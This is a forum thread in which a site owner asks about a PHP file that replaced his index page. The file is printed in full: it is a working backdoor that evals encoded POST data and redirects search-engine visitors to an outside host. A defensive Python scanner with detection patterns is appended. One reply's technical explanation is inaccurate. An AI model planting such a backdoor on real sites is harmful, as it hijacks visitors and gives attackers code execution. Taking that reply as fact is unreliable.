problem on a non vb website - advice please

#1
03-24-2009, 10:58 AM
tipoboy
Join Date: Dec 2005
Location: scotland
Posts: 693

Hi there, I wonder if someone could help with a non vb problem I've got.

Yesterday I noticed I had a problem with a website I made: the index page wasn't showing up, and upon further inspection I found that it had been replaced with another that contained this:

PHP Code:
<?php
$a = @$_POST['a'];
if ($a && @$_POST['b'] == sha1(md5($a))) {
    $a = base64_decode($a);
    eval($a);
}

function get_counter() {
    $ip = $_SERVER['REMOTE_ADDR'];
    $uniq = @file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
    if ($uniq === false) {
        return false;
    }
    if ($uniq == "go") {
        return true;
    }
    return false;
}

$ref = strtolower(trim(@$_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
    if (get_counter()) {
        @header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
    if (get_counter()) {
        @header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}
?>
I've reuploaded my original page but was wondering what this piece of PHP is all about. If someone could explain what it is I'd appreciate it.

-thanks very much
-dave

#2
03-24-2009, 03:52 PM
TigerC10
Join Date: Apr 2006
Location: Austin, TX
Posts: 616

lol that's cute.

You either got hacked or your host restored a backup incorrectly and gave you someone else's phishing website. What this script does is it redirects a person to a website giving them all of your server information.

It grabs the memory address of the post variable on your server (this is so they can perform a buffer overflow attack on you later), then it checks the hacker's website to see if your server's IP address has already been added to his database. Finally it relies on someone finding your website through a search engine: if someone finds your site on Google or Yahoo (and clicks on it) then they are redirected to the hacker's website instead of yours. The website mentioned is known for a Windows verification scam, I believe they were trying to get serial numbers for Windows Vista or XP.

You should probably figure out a way of cleaning input on that site, that way this doesn't happen again.

#3
03-24-2009, 08:00 PM
tipoboy
Join Date: Dec 2005
Location: scotland
Posts: 693

Thanks for the advice. It's the second problem I've had like this in a month from this hosting, which really is the last straw, so I'm cancelling it.

Thanks again

- dave

#4
03-25-2009, 05:54 AM
TigerC10
Join Date: Apr 2006
Location: Austin, TX
Posts: 616

Don't be so quick to blame the host. It's usually a security flaw in one of your website scripts. You should be sure that if you're running customized code, you have some method of input cleaning when dealing with post variables.

#5
03-25-2009, 06:51 AM
Dismounted
Join Date: Jun 2005
Location: Melbourne, Australia
Posts: 15,047

Is that an actual file that had been replaced?

#6
03-25-2009, 07:42 AM
tipoboy
Join Date: Dec 2005
Location: scotland
Posts: 693

Yes, my index page had been completely replaced. I don't run any web scripts on the sites I host with that hosting company, it's just 4 plain HTML websites, which is what I was so concerned about.
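
A defender-side check for the file quoted in the first post, added here as an example (it is not code from the thread): it flags PHP appearing in a web root that should hold only static HTML, plus the three behaviours visible in that file, namely eval of base64-decoded request data, a redirect gated on the Referer header, and a remote lookup keyed on the visitor's IP. The rule names, `scan_text`, `scan_tree` and the sample with its placeholder host are assumptions of this example, and the rules are heuristics rather than a complete signature set.

```python
import os
import re

# Heuristic rules modelled on the file quoted in the first post. A rule fires
# only when ALL of its patterns occur in a file: the sample decodes and evals in
# separate statements, so a single "eval(base64_decode(" regex would miss it.
RULES = {
    "php_in_static_site": [r"<\?(?:php\b|=)"],
    "eval_of_decoded_request_data": [
        r"\$_(?:POST|GET|REQUEST|COOKIE)\b", r"\bbase64_decode\s*\(", r"\beval\s*\("],
    "referer_gated_redirect": [r"HTTP_REFERER", r"header\s*\(\s*[\"']Location:"],
    "remote_lookup_of_visitor_ip": [
        r"REMOTE_ADDR", r"file_get_contents\s*\(\s*[\"']https?://"],
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in RULES.items()}

def scan_text(text):
    """Return the sorted names of all rules whose patterns all match."""
    return sorted(n for n, pats in COMPILED.items() if all(p.search(text) for p in pats))

def scan_tree(root, exts=(".php", ".html", ".htm", ".js", ".htaccess")):
    """Walk a web root and map relative path -> matched rule names."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

# Constructed sample: same structure as the quoted file, placeholder host.
SAMPLE = ("<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a)))"
          "{$a=base64_decode($a);eval($a);}"
          "$ip=$_SERVER['REMOTE_ADDR'];"
          "$u=@file_get_contents(\"http://tds.example.invalid/ip.php?ip=$ip\");"
          "$ref=strtolower(@$_SERVER['HTTP_REFERER']);"
          "if(strpos($ref,'google')!==false){@header(\"Location: http://tds.example.invalid/\");} ?>")
CLEAN = "<html><body><h1>Welcome</h1></body></html>"

if __name__ == "__main__":
    print(scan_text(SAMPLE))
    print(scan_text(CLEAN))
```

Run `scan_tree` against a downloaded copy of the web root; on a site that is meant to be plain HTML, any `php_in_static_site` hit is worth investigating on its own.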